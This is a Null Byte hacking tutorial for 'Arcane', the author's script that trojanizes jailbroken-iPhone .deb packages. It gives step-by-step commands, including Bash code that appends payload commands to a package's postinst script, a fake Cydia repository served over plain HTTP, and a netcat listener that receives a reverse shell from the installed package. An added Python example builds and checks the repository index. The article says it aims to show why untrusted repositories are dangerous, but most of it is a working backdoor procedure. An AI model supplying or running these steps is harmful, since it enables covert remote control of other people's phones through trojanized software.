
How to Embed Payloads into iPhone Packages with Arcane (Null Byte :: WonderHowTo)



It is a common misconception that iPhones are immune to cyber attacks and inherently "more secure" than Android. And when an iPhone is compromised, it is often very hard to tell that it happened.

Vulnerabilities in iOS are common, and Apple patches them with every security update it ships. Consider the CVEs published over the last year alone: Apple has released fixes for over 180 of them so far in 2020, and likely many more that were never publicly reported.

How Do You Hack an iPhone?

Jailbreaks released over the past decade rely on a variety of iOS exploits. Government agencies use undisclosed exploits every day to compromise iPhones. Exploit acquisition platforms like Zerodium offer up to $2 million for private iOS vulnerabilities.

This article does not present a magic button for easy access to everyone's iPhone. It gives readers an idea of what is possible with remote access to an iPhone, and of why adding untrusted jailbreak repositories is dangerous.

Step 1: Jailbreak an iPhone

A jailbroken iOS device is required to follow this guide. I'm testing this attack against an iPhone 7 Plus with iOS 13.4.1 and an iPhone 7 with iOS 13.5. The iOS devices were jailbroken using the unc0ver method. You can also try alternative jailbreaks like Checkra1n.

Step 2: Clone the Arcane Repository

Arcane is a simple automation script that backdoors iOS packages and generates the resources needed to host a Cydia repository. I created Arcane for this article to make the process quick and accessible for beginners. Before cloning the repository, make sure the required dependencies are installed and up to date.

~$ sudo apt-get update && sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils git python3

[sudo] password for kali:
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [16.7 MB]
Get:3 http://kali.download/kali kali-rolling/non-free amd64 Packages [197 kB]
Get:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [96.4 kB]
Fetched 17.0 MB in 4s (3,928 kB/s)
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
dpkg is already the newest version (1.19.7kali1).
python3 is already the newest version (3.8.2-3).
python3 set to manually installed.
The following additional packages will be installed:
   git-man (1:2.27.0-1)
   libbz2-1.0 (1.0.8-3)
Suggested packages:
   bzip2-doc (1.0.8-3)
   git-daemon-run (1:2.27.0-1)
   | git-daemon-sysvinit (1:2.27.0-1)
   git-doc (1:2.27.0-1)
   git-el (1:2.27.0-1)
   git-email (1:2.27.0-1)
   git-gui (1:2.27.0-1)
   gitk (1:2.27.0-1)
   gitweb (1:2.27.0-1)
   git-cvs (1:2.27.0-1)
   git-mediawiki (1:2.27.0-1)
   git-svn (1:2.27.0-1)
The following packages will be upgraded:
   bzip2 (1.0.8-2 => 1.0.8-3)
   git (1:2.26.2-1 => 1:2.27.0-1)
   git-man (1:2.26.2-1 => 1:2.27.0-1)
   libbz2-1.0 (1.0.8-2 => 1.0.8-3)
   netcat-traditional (1.10-41.1+b1 => 1.10-45)
5 upgraded, 0 newly installed, 0 to remove and 767 not upgraded.
Need to get 8,643 kB of archives.
After this operation, 2,424 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 bzip2 amd64 1.0.8-3 [49.2 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 libbz2-1.0 amd64 1.0.8-3 [45.7 kB]
Get:3 http://kali.download/kali kali-rolling/main amd64 netcat-traditional amd64 1.10-45 [67.5 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 git amd64 1:2.27.0-1 [6,707 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 git-man all 1:2.27.0-1 [1,774 kB]
Fetched 8,643 kB in 2s (4,982 kB/s)
apt-listchanges: Reading changelogs...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../bzip2_1.0.8-3_amd64.deb ...
Unpacking bzip2 (1.0.8-3) over (1.0.8-2) ...
Preparing to unpack .../libbz2-1.0_1.0.8-3_amd64.deb ...
Unpacking libbz2-1.0:amd64 (1.0.8-3) over (1.0.8-2) ...
Setting up libbz2-1.0:amd64 (1.0.8-3) ...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../netcat-traditional_1.10-45_amd64.deb ...
Unpacking netcat-traditional (1.10-45) over (1.10-41.1+b1) ...
Preparing to unpack .../git_1%3a2.27.0-1_amd64.deb ...
Unpacking git (1:2.27.0-1) over (1:2.26.2-1) ...
Preparing to unpack .../git-man_1%3a2.27.0-1_all.deb ...
Unpacking git-man (1:2.27.0-1) over (1:2.26.2-1) ...
Setting up netcat-traditional (1.10-45) ...
Setting up bzip2 (1.0.8-3) ...
Setting up git-man (1:2.27.0-1) ...
Setting up git (1:2.27.0-1) ...
Processing triggers for libc-bin (2.30-4) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

When this is done, clone the Arcane repository.

~$ sudo git clone https://github.com/tokyoneon/Arcane /opt/arcane

Cloning into '/opt/arcane'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 2.95 MiB/s, done.

Change the ownership recursively (-R) so the files can be used without root privileges.

~$ sudo chown $USER:$USER -R /opt/arcane/

Change into the new /opt/arcane directory.

~$ cd /opt/arcane/

Give the arcane.sh script execute permission so it can be run in Kali.

~/opt/arcane$ sudo chmod +x arcane.sh

To see the available options, run Arcane with the --help argument.

~/opt/arcane$ ./arcane.sh --help

[░] ./arcane.sh --input package.deb --lhost  --lport <1337>

  -i, --input   iOS package to backdoor
  -f, --file    file containing commands to exec (default: not required)
  -h, --lhost   local ip address for nc listener
  -p, --lport   local port for netcat listener (default: 1337)
  -c, --cydia   generate resources for apt/cydia repository (default: disabled)
  -n, --netcat  autostart netcat listener (default: disabled)
  -u, --udp     enable udp (default: tcp)
  -x, --noart   if you hate awesome ascii art (default: enabled)
      --help    you're looking at it

Step 3: Backdoor an iOS Package

The Arcane repository contains a "samples/" directory with several packages compiled for the iOS architecture (iphoneos-arm). Use the ls command to list its contents.

~/opt/arcane$ ls -la samples/

total 400
drwxr-xr-x 2 root root   4096 Aug  4 11:32 .
drwxr-xr-x 5 root root   4096 Aug  4 11:32 ..
-rw-r--r-- 1 root root 100748 Aug  4 11:32 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Aug  4 11:32 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  76688 Aug  4 11:32 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  60866 Aug  4 11:32 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root  13810 Aug  4 11:32 whois_5.3.2-1_iphoneos-arm.deb

The samples were taken from the official Bingner Cydia repo, and any package from that repo can be used if you want to follow along with a different one. Use the following command to print a complete list of the packages available in the repository.

~/opt/arcane$ wget -qO- 'https://apt.bingner.com/dists/ios/1443.00/main/binary-iphoneos-arm/Packages' | awk -v i='https://apt.bingner.com/' '/debs\//{print i $2}'

https://apt.bingner.com/debs/1443.00/3proxy_0.5.3k-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/adv-cmds_119-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/afpfs-ng_0.8.1-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr_1.6.3-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr-lib_1.6.3-1_iphoneos-arm.deb
...
https://apt.bingner.com/debs/1443.00/xt_1.1.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xtrans_1.3.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xz_5.2.4-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zip_2.32-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zsh_5.7.1-3_iphoneos-arm.deb

Simply wget the package of your choice. This walkthrough uses a package from the samples/ directory. Use the following arcane command to backdoor it.

~/opt/arcane$ ./arcane.sh --input samples/whois_5.3.2-1_iphoneos-arm.deb --lhost 172.16.16.1 --lport 20001 --cydia --netcat

  ░█████╗░██████╗░░█████╗░░█████╗░███╗░░██╗███████╗
  ██╔══██╗██╔══██╗██╔══██╗██╔══██╗████╗░██║██╔════╝
  ███████║██████╔╝██║░░╚═╝███████║██╔██╗██║█████╗░░
  ██╔══██║██╔══██╗██║░░██╗██╔══██║██║╚████║██╔══╝░░
  ██║░░██║██║░░██║╚█████╔╝██║░░██║██║░╚███║███████╗
  ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚══╝╚══════╝
                 v0.1 by @tokyoneon_

Below is a brief description of each argument. The GIF in the original article shows the package being generated.

  • --input: The file path of the package to backdoor.
  • --lhost: The attacker's IP address; the lhost (local host) is a required argument. It tells the backdoored package where Kali is on the network. In this case my Kali system is at 172.16.16.1.
  • --lport: An arbitrary value, here 20001; the lport (local port) tells the backdoored package which port the Netcat listener is on.
  • --cydia: Tells Arcane to generate the files needed to host a Cydia repository.
  • --netcat: Tells Arcane to automatically start a Netcat listener with the specified protocol and port.

Once the process completes, the Arcane terminal is occupied by the Netcat listener, which waits for an incoming connection, so it cannot be used for anything else.

Step 4: Host the Repository Resources

Open a new terminal in Kali and list the contents of the /tmp/cydia directory. Note the backdoored package.

~$ ls -la /tmp/cydia/

-rw-r--r--  1 root root    29 Jul 29 14:44 index.html
-rw-r--r--  1 root root   639 Jul 29 14:44 Packages
-rw-r--r--  1 root root   494 Jul 29 14:44 Packages.bz2
-rw-r--r--  1 root root   143 Jul 29 14:44 Release
-rw-r--r--  1 root root 14064 Jul 29 14:44 whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb

Change into that directory and start a simple python3 web server so the files are reachable by other devices (e.g., an iPhone) on the same network.

~$ cd /tmp/cydia; sudo python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
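
What the Python server is actually serving is an apt-style index: a Packages file (one stanza per .deb, holding the control fields plus Filename, Size and hash fields), its bzip2-compressed copy, and a Release file that lists hashes of the index files. The example below is added here and is not Arcane's code or part of the original article. It builds that index from a constructed package entry, parses it back the way a client would, and performs the integrity check a cautious client can do on a downloaded .deb. The control text and the stand-in .deb bytes are constructed, and the Release header values are assumptions.

```python
import bz2
import hashlib

# Assumed Release header for the example; Cydia mostly cares about the Packages
# index and the per-file hashes, not about these values.
RELEASE_HEADER = """Origin: constructed-repo
Label: constructed-repo
Suite: stable
Version: 1.0
Codename: ios
Architectures: iphoneos-arm
Components: main
Description: constructed example repository
"""


def file_hashes(data):
    return {"MD5sum": hashlib.md5(data).hexdigest(),
            "SHA1": hashlib.sha1(data).hexdigest(),
            "SHA256": hashlib.sha256(data).hexdigest()}


def packages_stanza(control_text, filename, deb_bytes):
    """One Packages entry: the package's control fields plus the repo-side
    Filename, Size and hash fields a client uses to fetch and check the .deb."""
    stanza = control_text.strip() + "\n"
    stanza += "Filename: %s\nSize: %d\n" % (filename, len(deb_bytes))
    for field, digest in file_hashes(deb_bytes).items():
        stanza += "%s: %s\n" % (field, digest)
    return stanza


def build_index(entries):
    """entries: [(control_text, filename, deb_bytes)] -> (Packages, Packages.bz2, Release)."""
    packages = "\n".join(packages_stanza(*e) for e in entries).encode()
    packages_bz2 = bz2.compress(packages)
    release = RELEASE_HEADER
    for label, algo in (("MD5Sum", hashlib.md5), ("SHA256", hashlib.sha256)):
        release += label + ":\n"
        for name, data in (("Packages", packages), ("Packages.bz2", packages_bz2)):
            release += " %s %d %s\n" % (algo(data).hexdigest(), len(data), name)
    return packages, packages_bz2, release


def parse_packages(text):
    """Parse the RFC 822-style Packages index into a list of field dicts."""
    stanzas = []
    for block in text.strip().split("\n\n"):
        fields, last = {}, None
        for line in block.splitlines():
            if line[:1] in (" ", "\t") and last:      # continuation of a multi-line field
                fields[last] += "\n" + line.strip()
                continue
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
            last = key.strip()
        stanzas.append(fields)
    return stanzas


def verify_download(stanza, deb_bytes):
    """Names of index fields the downloaded .deb does not match
    (an empty list means the file is the one the index describes)."""
    expected = {"Size": str(len(deb_bytes)), **file_hashes(deb_bytes)}
    return [f for f in ("Size", "MD5sum", "SHA1", "SHA256")
            if f in stanza and stanza[f] != expected[f]]


# Constructed inputs: control fields modelled on the article's whois package and
# a stand-in for the .deb bytes (no real package is embedded here).
WHOIS_CONTROL = """Package: whois
Version: 5.3.2-1
Architecture: iphoneos-arm
Name: whois
Description: constructed sample entry
 second line of the description
"""
WHOIS_DEB = b"!<arch>\nconstructed stand-in for whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb"

if __name__ == "__main__":
    packages, packages_bz2, release = build_index(
        [(WHOIS_CONTROL, "whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb", WHOIS_DEB)])
    print(packages.decode())
    print(release)
    entry = parse_packages(packages.decode())[0]
    print("intact:", verify_download(entry, WHOIS_DEB))
    print("tampered:", verify_download(entry, WHOIS_DEB + b"\n"))
```

The hashes in Packages bind a download to the index, and Release binds the index files to itself, but nothing in this layout binds the index to a trusted publisher: there is no Release.gpg or InRelease signature, and in the walkthrough everything travels over plain HTTP. The check above therefore catches a corrupted or swapped .deb, not a repository that was regenerated end to end by whoever controls the server or the network path, which is exactly the position the Kali box is in here.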

Step 5: Add the Repository to Cydia

Make sure that the jailbroken iOS device and the Kali system are on the same Wi-Fi network. Then open the Cydia app and navigate to the “Sources” tab. Select the “Edit” button in the top right and then the “Add” button in the top left.

When prompted for a URL, enter the IP address of the Kali system running the Python server. Make sure to remove the "s" from the "https://" that Cydia fills in by default, since the Python server only speaks plain HTTP. Select "Add Source" to add it as a repository. Finally, select "Back to Cydia" to find the newly added repository.

Step 6: Install the Backdoored Package

Select the repository to find the backdoored package. Make sure the Arcane terminal in Kali is still listening, then select "Install" and "Confirm" in Cydia. Cydia installs the package and executes the embedded payload.

How Arcane Works

In the Arcane terminal, successful command execution results in an "arcane>" shell prompt. Use sw_vers and uname -a to display the operating system and kernel versions.

[░] /usr/bin/nc -v -l -p 20001
[░] starting netcat listener on port 20001 with tcp
listening on [any] 20001 ...
172.16.16.25: inverse host lookup failed: Unknown host
connect to [172.16.16.1] from (UNKNOWN) [172.16.16.25] 56050

arcane> sw_vers
ProductName:    iPhone OS
ProductVersion: 13.4.1
BuildVersion:   17E262
arcane> uname -a
Darwin iPhone 19.4.0 Darwin Kernel Version 19.4.0: Mon Feb 24 22:04:12 PST 2020; root:xnu-6153.102.3~1/RELEASE_ARM64_T8010 iPhone9,4 arm64 D111AP Darwin
arcane>

At this point, various post-exploitation attacks are possible, but first let's look at what Arcane actually did. Several things happen in the GIF shown in Step 3.

In Kali, extract the whois package that was just installed on the iOS device.

~$ dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

Use tree to display the directory contents. Note the "DEBIAN" directory, which contains a "control" file and a "postinst" file. Both matter here: Cydia uses the control file to index the package, and the package manager runs postinst to execute commands during installation.

~$ tree /tmp/whois-decomp/

/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois

The "control" file (the package's control data) holds the metadata fields that package-management tools like dpkg use when installing packages. Arcane either modifies an existing control file or creates one from a template.

# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker 
Maintainer: $hacker ";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to location in Cydia.
    msg "detected control file" succ;
    # $hacker must be expanded by the shell, so the expression is double-quoted.
    sed -i "0,/^Name:.*/s//Name: $hacker backdoor/" "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;

A package can also ship scripts that run when it is installed, upgraded, or removed. These maintainer scripts are the files preinst, postinst, prerm, and postrm. Arcane uses the "postinst" file to execute commands during installation.

# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the bottom of the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    chmod 0755 "$postinst"
};

Readers are encouraged to review the Arcane source to better understand the underlying commands.

iOS Post-Exploitation Attacks

Apple's iOS and macOS are closely related. Both are built on Darwin, which incorporates large parts of FreeBSD's kernel subsystems and userland, so there is a lot of overlap in how the systems are organized, e.g., launchctl, the keychain, and the filesystem layout.

However, readers will immediately notice that wget, ifconfig, curl, netstat, and other familiar commands are not available, because those binaries are not installed on iOS by default. Stay tuned to Null Byte, where I will explain workarounds for the missing commands and cover post-exploitation attacks in more detail.

Follow me on Twitter @tokyoneon_ and GitHub to stay up to date on my current projects. And if you have any questions or concerns, leave a comment or ping me on Twitter.


Cover image, screenshots, and GIF by tokyoneon/Null Byte



